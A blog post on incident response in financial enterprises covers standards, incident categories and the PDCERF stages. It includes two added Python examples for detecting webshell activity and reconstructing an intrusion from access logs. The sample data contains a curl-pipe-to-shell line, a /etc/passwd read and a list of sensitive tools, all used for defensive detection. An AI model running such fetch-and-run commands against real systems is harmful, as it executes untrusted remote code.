The foundation of network security emergency response in financial enterprises

Posted by punzalan at 2020-03-02

Gartner has put forward the Adaptive Security Architecture (ASA) as the security architecture framework for the next generation. The framework emphasizes that security protection is a continuous, cyclic process across four dimensions: prediction, defense, detection and response. It analyzes security threats in a fine-grained, multi-angle, continuous, real-time and dynamic way, automatically adapts to the changing network and threat environment, and constantly optimizes its own defense mechanisms.

In other words, Gartner takes the view that an enterprise's security problems or vulnerabilities will inevitably be discovered and exploited by someone; the question is how to respond more effectively. Discussion of emergency response easily degenerates into "a machine got hacked, log in, run a few commands, look at the logs and check for backdoors". In fact there is a great deal of knowledge in it.

For emergency response, there are first of all targeted national standards available for reference, including the following:

GB/T 24363-2009 Specification for information security emergency response plans

GB/Z 20985-2007 Information security incident management guide

GB/Z 20986-2007 Guidelines for the classification and grading of information security incidents

For the financial industry, the CBRC has also issued guidelines for emergency response to cross-industry information system incidents covering banks, securities firms and so on. In addition there is the PDCERF model, which divides emergency response into six stages: preparation, detection, containment, eradication, recovery and follow-up, as follows:

Preparation: the work done before an incident, including strategy, plans, specification documents, and the specific technical tools and platforms

Detection: a preliminary judgment of what type of problem it is, which systems are affected and how severe it is

Containment: limiting the scope of the attack and the damage, commonly called "stopping the bleeding"

Eradication: analyzing the cause of the incident and solving the problem thoroughly, so that the same mistake is not made again

Recovery: returning the business to its normal level

Follow-up: implementing and tracking the rectification measures for the incident; in other words, continuous improvement of security operations

Secondly, with these standards, models and guidelines in hand, an enterprise needs to formulate its own emergency response specification based on its actual situation, covering the classification and grading of incidents, organization and responsibilities, the handling process, and even the templates for incident analysis and handling reports.

GB/Z 20986-2007, the guidelines for the classification and grading of information security incidents, divides information security incidents by their cause, manifestation and result into seven basic categories: malicious program incidents, network attack incidents, information destruction incidents, information content security incidents, equipment and facility failures, disaster incidents and other information security incidents. Each basic category includes several sub-categories:

Malicious program incidents (computer virus incidents, worm incidents, Trojan horse incidents, botnet incidents, blended attack incidents, web page embedded malicious code incidents, other harmful program incidents)

Network attack incidents (denial of service attack incidents, backdoor attack incidents, vulnerability attack incidents, network scanning and eavesdropping incidents, phishing incidents, interference incidents, other network attack incidents)

Information destruction incidents (information tampering incidents, information counterfeiting incidents, information disclosure incidents, information theft incidents, information loss incidents, other information destruction incidents)

Information content security incidents (incidents involving content that violates the Constitution, laws or administrative regulations; incidents that discuss and comment on social issues and form sensitive public-opinion hotspots on the Internet; incidents of hype or organized concatenation at a certain scale; incidents inciting gatherings and marches; other information content security incidents)

Equipment and facility failures (software and hardware failures, failures of peripheral support facilities, human damage accidents, other equipment and facility failures)

Disaster incidents

Other information security incidents

Within an enterprise we mostly encounter the first several categories. After sorting them out according to our actual situation and our own understanding, we classify them as follows:

1. Attacks against Internet-facing applications

Internet-facing applications are the most likely targets for hackers because they are openly accessible from the Internet. With the emergence of all kinds of automated scanning tools, the systems see scanning requests every day: scanners try SQL injection, XSS, file upload vulnerabilities, directory traversal, requests for specific files and other web vulnerability probes. Against login interfaces, hackers run brute-force and credential-stuffing attacks; against certain URLs or API interfaces, hackers enumerate requests to obtain more information. If they get further into the system, privilege escalation, backdoor installation and log cleaning occur from time to time; and if all of this fails, hackers may also resort to DDoS attacks for profit.

2. Attacks on the intranet

Employees in an enterprise usually keep in touch with the outside world through channels such as email, Internet access and USB drives, and these three points are also easy for external attackers to use. An email carries a malicious attachment and the machine is controlled once the user clicks it; a web page the user visits may be a drive-by exploit page and the user is compromised on visiting it; an outsider's USB drive plugged into an internal computer may also infect the machine with a malicious program, and so on. Once the malicious program is inside the intranet it goes on to explore the network structure and find the most valuable targets and systems; after reaching the target it may exfiltrate the required information by various means. The ransomware that has been popular in recent years is more simple and crude: it directly encrypts the user's document data and demands a certain amount of bitcoin from the victim for the decryption key.

3. Information disclosure from inside

In addition to attacks from outside, there may be unintentional or intentional information disclosure by internal employees. In the following case, for example, a document was left behind on the photocopier, and an employee photographed it and posted it to WeChat Moments:

More intentional leaks may be hidden behind the scenes, as in the following report:

In that case, Tencent discovered that a member of the underground cybercrime industry had joined the company and later reported the case to the police. As the incident unfolded, it emerged that this person had been employed by a number of Internet companies, and the list of those companies began to spread in the community.

Incident grading depends mainly on the importance of the affected system and the severity of the problem. Obviously a core business system, an edge business system and a non-business system should be distinguished from each other, and it is an entirely different matter whether the attacker obtained system privileges directly, obtained only webshell privileges, or merely found a phpinfo information disclosure.


Preparation stage

The first stage of the PDCERF model is preparation, which covers the emergency response standards system as well as the construction and operation of specific technical tools and platforms. Once the specification has been formulated it must actually be put into practice, and handling efficiency can be improved through simulation exercises. Tools and platforms are different things. Tools are things like statically compiled ls, lsof, ps and netstat, and scripts that can quickly analyze log characteristics and scan files; they do their work on the target machine. Platforms are the centralized logs collected by the various security systems on terminals, networks and applications after the enterprise has deployed FW, NIDS, HIDS, WAF and other systems; these logs are sent to the platform for correlation analysis (for example, a SOC system).

Detection stage

After an incident occurs, it is necessary to judge which systems are affected and what the nature of the incident is. This is the detection stage. Based on the preliminary analysis, different handling processes are adopted for emergency disposal. For example, if an edge Internet system raises an alarm on the SOC system for scanning behaviour, it may only need an operator to simply block it, and an enterprise with good security automation may block it automatically without entering the emergency response process at all. Going a step further, if the edge system alarm shows execution of sensitive commands and the parent process belongs to the web application, emergency response staff probably need to start handling it; as for whether to report it, and to which level, it is likely to be reported only to the security manager. Further still, if the online banking system sees a large number of attacks against the database and a customer reports that his account has been locked repeatedly because of failed logins, it is certainly not appropriate to report only to the security manager. Besides understanding the business, there is also technical work to do: for a large-traffic alarm, is it normal business, a release, or an attack, and if an attack, is it a regular DDoS, a CC attack, or a compromised machine sending packets outbound? Another example: after a malicious email is delivered, what vulnerability does it use and what is its callback address?
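The detection heuristic described above, "a sensitive command whose parent process is the web application on an edge system", is shown below as an added example over constructed HIDS process events; it is not code from the original post, and the event field names, the list of web server process names and the escalation mapping are all assumptions.

```python
import json
import shlex

# Constructed HIDS process-execution events (JSON lines); field names are assumed.
SAMPLE_EVENTS = """\
{"host": "edge-web-01", "tier": "edge", "parent": "java", "cmd": "whoami", "user": "tomcat"}
{"host": "edge-web-01", "tier": "edge", "parent": "java", "cmd": "bash -c 'curl http://203.0.113.9/x.sh | sh'", "user": "tomcat"}
{"host": "edge-web-01", "tier": "edge", "parent": "sshd", "cmd": "ls -la /var/log", "user": "ops"}
{"host": "ebank-app-02", "tier": "core", "parent": "java", "cmd": "cat /etc/passwd", "user": "ebank"}
{"host": "ebank-app-02", "tier": "core", "parent": "cron", "cmd": "/usr/sbin/logrotate /etc/logrotate.conf", "user": "root"}
"""

# Processes that serve web applications; a shell or recon tool spawned by one of
# these is the webshell indicator the post describes (assumed list).
WEB_PARENTS = {"java", "tomcat", "php-fpm", "httpd", "nginx", "w3wp.exe"}
SENSITIVE_CMDS = {"whoami", "id", "cat", "bash", "sh", "curl", "wget", "nc", "python"}

def is_web_spawned_sensitive(event):
    """True when a sensitive command's parent is a web application process."""
    exe = shlex.split(event["cmd"])[0].rsplit("/", 1)[-1]
    return event["parent"] in WEB_PARENTS and exe in SENSITIVE_CMDS

def escalation_level(event):
    """Who the alert is reported to, following the post's reasoning: an edge
    system goes to the security manager; a core system (e.g. online banking)
    must be escalated beyond that. The tier labels are assumed."""
    return "management" if event["tier"] == "core" else "security_manager"

def triage(jsonl):
    """Run the rule over a batch of events and return the alerts to escalate."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if is_web_spawned_sensitive(event):
            alerts.append({"host": event["host"], "cmd": event["cmd"],
                           "level": escalation_level(event)})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The sshd- and cron-spawned commands are left alone even though `cat /etc/passwd` appears in the sensitive list: the rule keys on the parent process, not the command alone, which is what keeps it from firing on ordinary administration.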

Containment stage

With the judgment and analysis above, we can apply targeted measures to stop the bleeding; this is the work of the containment stage. Whether an attack from the external network is handled by blocking the source IP or by traffic scrubbing, and whether an attack inside the intranet is handled by blocking the egress or by intervening on the terminal, these are all execution-level tasks. Drilling them regularly and automating them as far as possible will greatly improve efficiency.


Eradication stage

Conduct root cause analysis of the incident to locate the real cause. For example, the edge business system mentioned above had a webshell planted on it: what vulnerability made that possible? By analyzing the logs we try to reconstruct the entire intrusion path, and from that find out what vulnerabilities exist, which makes the subsequent rectification work easier.
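As an added example of the log-driven reconstruction described above (not code from the original post), the function below starts from the webshell path found on disk and walks a constructed web access log backwards to the attacker's probing and the upload that most plausibly created the file, then forwards to every invocation of the shell. The log lines, IPs and paths are constructed, and the combined-log format is an assumption.

```python
import re

# Constructed access-log excerpt for the edge system in the example; the IPs,
# paths and timestamps are made up and the format is a common combined-log style.
ACCESS_LOG = """\
198.51.100.7 - - [01/Mar/2020:10:01:02 +0800] "GET /index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2020:10:01:09 +0800] "GET /admin/../WEB-INF/web.xml HTTP/1.1" 403 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2020:10:02:31 +0800] "POST /upload/avatar HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2020:10:02:40 +0800] "GET /uploads/avatar/x.jsp?cmd=whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2020:10:03:00 +0800] "GET /index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2020:10:05:12 +0800] "GET /uploads/avatar/x.jsp?cmd=id HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def parse(log):
    """Parse each line into a dict; the path is the URL without its query string."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["path"] = e["url"].split("?", 1)[0]
            e["status"] = int(e["status"])
            events.append(e)
    return events

def intrusion_path(log, webshell_path):
    """Reconstruct the intrusion timeline around a known webshell path, or
    return None if the path never appears in the log."""
    events = parse(log)
    hits = [e for e in events if e["path"] == webshell_path]
    if not hits:
        return None
    attacker = hits[0]["ip"]
    before = events[:events.index(hits[0])]
    mine = [e for e in before if e["ip"] == attacker]
    # The last successful POST before the first hit is the upload candidate.
    uploads = [e for e in mine if e["method"] == "POST" and e["status"] == 200]
    return {
        "attacker": attacker,
        "first_seen": mine[0]["ts"] if mine else hits[0]["ts"],
        "probes": [e["url"] for e in mine if e["status"] in (401, 403, 404)],
        "upload": uploads[-1]["url"] if uploads else None,
        "webshell_requests": [e["url"] for e in hits if e["ip"] == attacker],
    }

if __name__ == "__main__":
    print(intrusion_path(ACCESS_LOG, "/uploads/avatar/x.jsp"))
```

The upload endpoint this returns is the place to look for the missing file-type check, which is the vulnerability the rectification work then has to fix.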


Recovery stage

Restore normal business. This process needs no elaboration, provided the problem has actually been solved.


Follow-up stage

When security incidents keep occurring, it means the security system is imperfect or there are failures in the operational process. This is a good opportunity to analyze the root cause of the incidents and find the defects in the existing security controls. For example, if the WAF in front did not block a request but the IPS behind it raised an alert, the WAF policy can be optimized accordingly; or if a mobile phone number on a page was not masked and was noticed by outsiders, the various problems from development and testing through to operations can be tracked down, and if the information leak was not effectively monitored in security operations, that is an improvement point too. Finally, have these improvement points been assigned to a person, a deadline and an effectiveness check? That is the work of this stage.

Finally, one more point that has nothing to do with emergency response itself. In actual work, consider this scenario: what is it like when the regulator receives a vulnerability report about a financial institution and the institution itself knows nothing about it? Or when senior management receives an email from an external security company saying that your organization has vulnerabilities that may be exploited by others? They will be very much on the back foot. Besides their own efforts in security defense technology and operations, security teams also need to do other work, such as communication, relationships and intelligence. Internet companies have their own SRC (Security Response Center), through which white hats can report vulnerabilities and be rewarded. On the one hand this uses white hats to find enterprise vulnerabilities and improve enterprise security; on the other hand it reduces the probability that vulnerabilities are exposed on uncontrollable platforms, and so reduces the passive situation.

(to be continued, Part 2: technical part of emergency response)


Enterprise security construction cannot do without mutual help and looking out for each other. During past security incidents and emergencies there have been many live discussions in the WeChat group for security construction in financial enterprises, and the timeliness and effectiveness of the handling measures shared there have benefited me a lot. If you are a corporate security lead and are interested in joining, please follow the WeChat official account "Jun brother's body calendar", send a message in the background with your WeChat ID and company name, and verify your identity after entering the group.

Postscript:

Nie Jun, an information security practitioner with more than ten years of experience in information security in the financial industry. Fond of reading without insisting on understanding every detail; cheerful by nature, likes football.

The articles on this subscription account share personal experiences and reflections from work and life. Read from different perspectives and positions they will be understood differently and opinions will differ; they do not seek uniform correctness, but truth, goodness and beauty.
